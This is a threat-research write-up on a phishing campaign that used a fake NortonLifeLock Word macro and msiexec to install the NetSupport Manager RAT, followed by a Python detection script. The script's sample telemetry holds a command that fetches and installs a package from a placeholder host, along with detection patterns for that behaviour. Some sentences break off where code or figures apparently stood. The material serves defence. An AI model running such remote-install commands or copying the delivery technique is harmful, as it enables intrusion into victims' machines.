In January 2020, the Cortex XDR Managed Threat Hunting team, part of Unit 42, identified a malicious Microsoft Word document, disguised as a password-protected NortonLifeLock document, being used in a phishing campaign to deliver a commercially available remote access tool (RAT) called NetSupport Manager. Using a fictitious NortonLifeLock document to entice the user to enable macros makes this particular attack interesting to us. This RAT is typically used for legitimate purposes, allowing administrators remote access to client computers. However, malicious operators are installing the RAT on victims' systems, allowing them to gain unauthorized access. During an initial review of the detection, which was flagged via Cortex XDR™, we observed that the causality chain began when a Microsoft Word document was opened from within Microsoft Office Outlook.

The use of this NetSupport Manager RAT for unauthorized access has been observed in phishing campaigns since at least 2018. While we do not have the actual email, we are able to conclude that this activity appears to be part of a larger campaign. This activity employs evasion techniques against both dynamic and static analysis and utilizes the PowerShell PowerSploit framework to carry out the installation of the malicious file. Through additional analysis, we identified related activity dating back to early November 2019. In this write-up, we will describe the anomalous activities as observed through Cortex XDR's behavioral detection capabilities.

In early January 2020, the Cortex XDR™ Engine detected a suspicious winword.exe process executing an obfuscated batch file. In Figure 1, you can see multiple points of detection, beginning with the initiating Microsoft Word process and continuing with the creation and execution of a. In Figure 2, you can see a rollup of the Timeline view showing an alert for a known bad indicator, the behavioral process execution, and attempted connection activities. Figure 3 shows the initial alert detected based on these behavioral indicators.

Figure: Cortex XDR™ causality chain timeline

Figure 4 below is a screenshot of the malicious document used, disguised as a password-protected NortonLifeLock document which requests the user to enter a password to enable macros.

Figure 4. Delivery document disguised as NortonLifeLock.

To the user, the document appears to contain personal information that requires a password to view. Once the document is opened and the user clicks “Enable Content”, the macro is executed and the user is presented with a password dialog box.

Figure: Password dialog box presented to the user

We suspect this password is provided in the phishing email, as the macro accepts only the letters ‘c’ or ‘C’, as shown in the macro code below. If the user enters an incorrect password, they are presented with an error message stating an incorrect key was entered, followed by a “done” processing message. It should be noted that no malicious activity occurs until the correct key is entered. Once the correct password is received, the macro continues code execution and builds the following command string:

The batch script uses msiexec, which is part of the Windows Installer service, to download and install a Microsoft Intermediate Language (MSIL) binary on the victim from the domain:

Figure 6. HTTP GET request to view.php on quickwaysignstxcom

The server that is serving view.php appears to be filtering on the user-agent string, as visiting the site with a browser displays a standard image for the webpage. If the user-agent string in the request is Windows Installer, an MSI file is returned. This user-agent string is part of the msiexec command, further supporting that the payload will only be downloaded when using msiexec. Note this domain appears to be a legitimate domain, which has been compromised and is being used by these operators.
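The behavioral indicators described in this write-up (an Office process launching a batch file, msiexec installing a package from a URL, and the Windows Installer user-agent requesting a server-side script instead of an .msi) expressed as detection logic over constructed telemetry. This is an added example, not code from the Unit 42 write-up or from Cortex XDR; the process-event tuples, the key="value" proxy log format, the file paths and the example.invalid host are all assumptions.

```python
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
BATCH_RE = re.compile(r"\.(bat|cmd)\b", re.IGNORECASE)
SCRIPT_URL_RE = re.compile(r"\.(php|aspx?|jsp)(\?|$)", re.IGNORECASE)
HTTP_LINE_RE = re.compile(r'ua="(?P<ua>[^"]*)"\s+url="(?P<url>[^"]*)"')

# Constructed process-creation telemetry (parent image, image, command line);
# the paths and the example.invalid host are placeholders, not values from the write-up.
PROCESS_EVENTS = [
    ("outlook.exe", "winword.exe", r"WINWORD.EXE /n C:\Users\u\Downloads\statement.doc"),
    ("winword.exe", "cmd.exe", r'cmd.exe /c "C:\Users\u\AppData\Local\Temp\x.bat"'),
    ("cmd.exe", "msiexec.exe", "msiexec /i http://example.invalid/view.php /q"),
    ("explorer.exe", "msiexec.exe", r"msiexec /i C:\Setup\tool.msi /qn"),  # benign local install
]
# Constructed proxy log lines in an assumed key="value" format: same endpoint, two user agents.
HTTP_LOGS = [
    'src=10.0.0.5 ua="Windows Installer" url="http://example.invalid/view.php"',
    'src=10.0.0.5 ua="Mozilla/5.0 (Windows NT 10.0)" url="http://example.invalid/view.php"',
]

def office_spawning_batch(events):
    """Office application launching a script host with a .bat/.cmd on its command line."""
    return [cmd for parent, image, cmd in events
            if parent.lower() in OFFICE_APPS
            and image.lower() in SCRIPT_HOSTS
            and BATCH_RE.search(cmd)]

def msiexec_remote_package(events):
    """msiexec told to install a package from a URL instead of a local path."""
    return [cmd for _, image, cmd in events
            if image.lower() == "msiexec.exe" and URL_RE.search(cmd)]

def installer_ua_to_script(lines):
    """'Windows Installer' user agent fetching a server-side script rather than an .msi file."""
    hits = []
    for line in lines:
        m = HTTP_LINE_RE.search(line)
        if m and m.group("ua") == "Windows Installer" and SCRIPT_URL_RE.search(m.group("url")):
            hits.append(m.group("url"))
    return hits

if __name__ == "__main__":
    print("office_batch:", office_spawning_batch(PROCESS_EVENTS))
    print("msiexec_url:", msiexec_remote_package(PROCESS_EVENTS))
    print("installer_ua:", installer_ua_to_script(HTTP_LOGS))
```

Each check alone produces noise in a real estate (administrators do run msiexec against internal URLs); the value is in correlating all three within one causality chain, as the Timeline view in the write-up does.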